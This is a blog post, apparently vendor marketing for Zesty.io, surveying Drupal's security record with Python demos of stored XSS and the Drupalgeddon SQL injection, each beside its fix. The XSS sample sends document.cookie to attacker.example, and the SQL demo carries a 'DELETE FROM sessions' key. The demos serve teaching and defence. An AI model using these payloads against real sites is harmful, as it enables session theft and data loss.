Drupal Security Reviews: Drupal Security Vulnerabilities Compared & Explained
Drupal has been providing its open source CMS platform since 2001. The platform has a dedicated fan base who stand by it through thick and thin, and many users describe Drupal as one of the most secure open source CMS platforms available.
Some Drupal developers who were once faithful to the platform are now looking to leave it behind, but why? One obvious candidate is the recent news of Drupalgeddon 2, which raises the common question: where does Drupal sit on the security scale?
History of Drupal Security
Since 2005, Drupal has had 312 documented vulnerabilities, 3 of which are known to have been exploited. In our experience, the number actually exploited is probably higher than the number documented as such.
Greg Knaddison, a Drupal security expert and author of Cracking Drupal: A Drop in the Bucket, which explains the vulnerabilities and security issues found in Drupal-built sites and how to prevent them, reviewed the documented vulnerabilities and found cross-site scripting (XSS) to be the most common class.
XSS is where attackers inject client-side script into web pages that are then viewed by other users; the script runs in each victim's browser with the site's own origin, so it can steal session cookies or act on the victim's behalf. Drupal community members as early as 2007 shared their experiences of sites hacked via XSS. One user, kayblaino, posted on Drupal's community forum to share how he found his site had been hacked by "The Mafia Hacking Team", who removed every file in his site's root directory. (XSS by itself only runs in the browser; deleting files on the server needs a further foothold, so the post does not tell us exactly how the attacker got in.)
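As an added illustration of the XSS bug class described above (example code written for this page, not code from Drupal or from the forum post), the following Python renders a visitor-submitted comment straight into HTML and then renders the same comment through HTML escaping. It also shows the attribute-context case, where escaping alone is not enough and a URL scheme allow-list is needed. The comment payload, URLs and function names are constructed for the demo.

```python
import html
from urllib.parse import urlsplit

# Constructed sample input: a comment as it would arrive from a site's comment
# form. The <script> payload is the textbook proof of concept, not something
# taken from the forum post discussed on this page.
UNTRUSTED_COMMENT = (
    'Nice post! <script>new Image().src='
    '"https://attacker.example/c?"+document.cookie</script>'
)

def render_comment_unsafe(comment):
    """Vulnerable: user input is concatenated straight into the page, so any
    markup in it (script tags, on* handlers) runs in every visitor's browser
    with the site's origin. This is stored XSS."""
    return f'<div class="comment">{comment}</div>'

def render_comment_safe(comment):
    """Hardened: escape &, <, >, " and ' before output so the browser treats
    the input as text. This is what Drupal's check_plain() (Drupal 7) and
    Html::escape() (Drupal 8+) do for text placed in element content."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'

def render_link_safe(url, label):
    """Escaping is context-specific. Inside href="..." an escaped
    javascript: URL is still a javascript: URL, so an attribute that takes a
    URL also needs a scheme allow-list; anything else is shown as plain text."""
    if urlsplit(url).scheme.lower() in ("http", "https"):
        return f'<a href="{html.escape(url, quote=True)}">{html.escape(label)}</a>'
    return f'<span>{html.escape(label)}</span>'

def contains_script_tag(rendered):
    """Crude check used here only to show the difference between renderers."""
    return "<script" in rendered.lower()

if __name__ == "__main__":
    print(render_comment_unsafe(UNTRUSTED_COMMENT))
    print(render_comment_safe(UNTRUSTED_COMMENT))
    print(render_link_safe("javascript:alert(1)", "click me"))
    print(render_link_safe("https://example.com/?a=1&b=2", "Site"))
```

The allow-list in render_link_safe deliberately rejects relative URLs as well as javascript: and data: schemes; loosen it only if the site actually needs relative links from untrusted users.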
Looking through the comments on that forum post, the only advice other Drupal community members could offer was to keep up with the latest security updates so the site would not be hacked in the first place. One of San Diego's largest amusement parks faced the same headache when its Drupal site was hacked in the past year.
Advising fellow community members to watch for the latest security updates is all well and good, but the problem lies in actually installing the security patch. Drupal does not install it for you; you have to do it yourself.
Because of time and resource constraints, not everyone can install the latest security updates straight away. There are alternatives like ours that require zero manual security patching; be sure to weigh your options before taking the risk.
Back in mid-October 2014, Drupal disclosed a severe vulnerability (SA-CORE-2014-005, CVE-2014-3704, later nicknamed Drupalgeddon) caused by a single line of code in Drupal 7's database abstraction layer. That one line let unauthenticated attackers inject SQL into otherwise parameterized queries, giving them the ability to read, manipulate or delete data in vulnerable sites' databases.
Worse, the underlying bug had first surfaced in November 2013, but its security impact was not recognized until September 2014, when Drupal's security team received a report from SektionEins, a German company that came across it while auditing a client's site.
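The following is an added Python illustration, not Drupal's own code: a toy re-implementation of the placeholder-expansion pattern behind that advisory. Drupal 7's database layer expanded an array-valued placeholder such as :name into :name_0, :name_1 and so on, and built the new placeholder names from the array's keys, which come straight from request data. The one-line fix switched to positional indices. The query, argument names, function names and the hostile key below are all constructed for this demo.

```python
import re

# Constructed sample query. The :name placeholder syntax and the expansion
# idea mirror Drupal 7's DatabaseConnection::expandArguments(); nothing here
# is Drupal's code.
QUERY = "SELECT uid FROM users WHERE name IN (:name)"

BENIGN_ARGS = {":name": ["alice", "bob"]}

# Hostile input: PHP turns a request parameter such as
#   name[0 ; DELETE FROM sessions -- ]=x
# into an array whose KEY carries the SQL. The key is made up for this demo.
HOSTILE_ARGS = {":name": {"0 ; DELETE FROM sessions -- ": "x"}}

def expand_placeholders(query, args, sanitize_keys):
    """Expand each array-valued placeholder into one placeholder per element.

    sanitize_keys=False  builds :name_<key> from the array's keys, the pre-fix
                         behaviour, so a hostile key lands in the SQL text.
    sanitize_keys=True   builds :name_<index> from positional indices, which
                         is what the one-line fix did (array_values()).
    Returns the rewritten query and the flattened argument dict."""
    args = dict(args)
    for name, data in list(args.items()):
        if not isinstance(data, (list, dict)):
            continue
        items = data.items() if isinstance(data, dict) else enumerate(data)
        new_args = {}
        for index, (key, value) in enumerate(items):
            suffix = index if sanitize_keys else key
            new_args[f"{name}_{suffix}"] = value
        # \b keeps :name from also matching :name_0 or :namex; a callable
        # replacement avoids re.sub interpreting backslashes in the text.
        replacement = ", ".join(new_args)
        query = re.sub(re.escape(name) + r"\b", lambda m: replacement, query)
        del args[name]
        args.update(new_args)
    return query, args

def placeholders_are_clean(query):
    """True when everything inside the IN (...) list is a :name_<digits>
    placeholder. Anything else means caller-controlled text reached the SQL."""
    inside = query[query.index("(") + 1:query.rindex(")")]
    return all(re.fullmatch(r":\w+_\d+", p) for p in inside.split(", "))

if __name__ == "__main__":
    cases = (("benign, pre-fix", BENIGN_ARGS, False),
             ("hostile, pre-fix", HOSTILE_ARGS, False),
             ("hostile, fixed", HOSTILE_ARGS, True))
    for label, args, fixed in cases:
        q, a = expand_placeholders(QUERY, args, sanitize_keys=fixed)
        print(f"{label:17} clean={placeholders_are_clean(q)!s:5} {q}")
```

The benign case expands identically in both modes, which is why the bug survived for so long: nothing in normal use ever exercised a non-numeric key.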
One notable victim of Drupalgeddon 1 was the Indiana Department of Education's website. Even though there was no sign that data had been compromised, visitors saw a bizarre message saying the site had been hacked by the "Nigerian Cyber Army".
Most recently, on 28 March 2018, Drupal released an emergency patch (SA-CORE-2018-002, CVE-2018-7600) for a "highly critical" flaw in Drupal 6, 7 and 8. The flaw let an unauthenticated attacker execute arbitrary code on a vulnerable site with a single crafted request; no login or special access was required.
Over a million sites were at risk, and it caused panic. One Reddit user, a web developer, received a frantic email from a Drupal site owner who had not updated the site in two years, asking for help.
“A non-profit that I used to volunteer for emailed me frantically asking if I can help them, saying they were hacked. I am not a Drupal guy, but through some online scanners and looking up the problem, I am pretty sure they got hit with Drupalgeddon 2, since they hadn't updated Drupal in two years and were still on 7.5. However, googling this problem, the main solution just seems to be to delete everything and to restore a clean backup.”
To make matters worse, two whole months after Drupalgeddon 2 struck, Drupal, and more importantly Drupal's user base, was still reeling from the bug. In May 2018, over 400 big-name Drupal sites, including Lenovo, the San Diego Zoo and the University of California, were found to be cryptojacked, running cryptocurrency-mining script in their visitors' browsers.
What Do Drupal Users Say?
You don’t have to look far to find out what other Drupal users have to say about security. One G2crowd reviewer had this to say about Drupal’s security:
“Drupal is high maintenance. It scales well and is very capable, and very easy to modify. The price you pay for this kind of flexibility is that it requires a rather large skill set to run it professionally and/or considerable (wo)manpower to keep it fast and secure. All of my Drupal sites were hacked eventually because I wasn't able to install the updates in time.”
Another G2crowd review had this to say:
“You need to plan for regularly updating the software, as there are frequent security patches in Drupal that need to be installed.”
Furthermore, a reviewer for Trust Radius had this to say:
“Security is an ongoing struggle for all users of open source CMS solutions. If you choose Drupal for your website, you will need a plan for security updates to ensure you are one step ahead of the hackers.”
The picture these users paint is consistent: a secure Drupal site is one whose updates and security patches are installed promptly and regularly. Ultimately, how secure your Drupal site is remains your responsibility. If for whatever reason you cannot install a security update, your Drupal site is at risk of being attacked.
If Drupal Is No Good, What About WordPress or Joomla?
In comparison, the other well-known open source CMSs, Joomla and WordPress, do not fare much better than Drupal; in some respects they fare worse.
Joomla has had 226 documented vulnerabilities since 2005, 135 of which are known to have been exploited. Only 10 documented vulnerabilities occurred in 2014, however; Joomla was most vulnerable between 2005 and 2010.
Since 2010, Joomla has seen fewer vulnerabilities and even fewer exploits. It did have a major vulnerability in 2013 that could have affected 1 in 10 Joomla sites, but that was resolved.
Despite having a dedicated security team, reassuringly named the Joomla Security Strike Team (JSST), you still have to update your site manually and regularly to keep it from being exposed to threats.
As for WordPress, despite powering around 30 percent of websites, it has had 301 documented vulnerabilities since 2005, 43 of which are known to have been exploited. In 2014 alone there were 29 documented vulnerabilities.
Of the vulnerabilities discovered in 2014, 23 were in WordPress core and the rest were in plugins. Popular WordPress plugins are frequent targets because they are generally less carefully reviewed than core and a single plugin bug can affect a large number of sites at once. Plugins such as RevSlider, FancyBox, WPTouch and MailPoet have all been affected in the past.
What’s the Alternative?
It is important to keep in mind that Drupal, WordPress and Joomla are open source platforms and are free to use. For enterprises, that can present a security concern: the code is not developed or maintained within a single controlled environment, and the responsibility for applying fixes falls on whoever runs the site.
Open source platforms are built by a community of developers from around the world. With so many contributors, core and contributed modules are maintained by different people on different schedules, and not every contributed module receives the same level of review as core. That unevenness is where attackers look first.
Closed source software, by contrast, is developed in a controlled environment by a dedicated team. Only that team can view and edit the source code, and it is responsible for auditing the code and shipping fixes. Being closed does not by itself make code more secure, but it does put the whole patching burden on the vendor instead of on every site owner.
Zesty.io is a closed source CMS with a clean security record to date. And unlike Drupal, Joomla and WordPress, you do not have to install security patches or updates yourself, because Zesty.io does that for you, leaving you more time to focus on growing your business. We suggest continuing to review your options with a keen eye on security benefits and how they affect cost and data risk over time.
By Gisele Blair
A designer knows he has achieved perfection not when there is nothing left to add, but when there is nothing left to take away.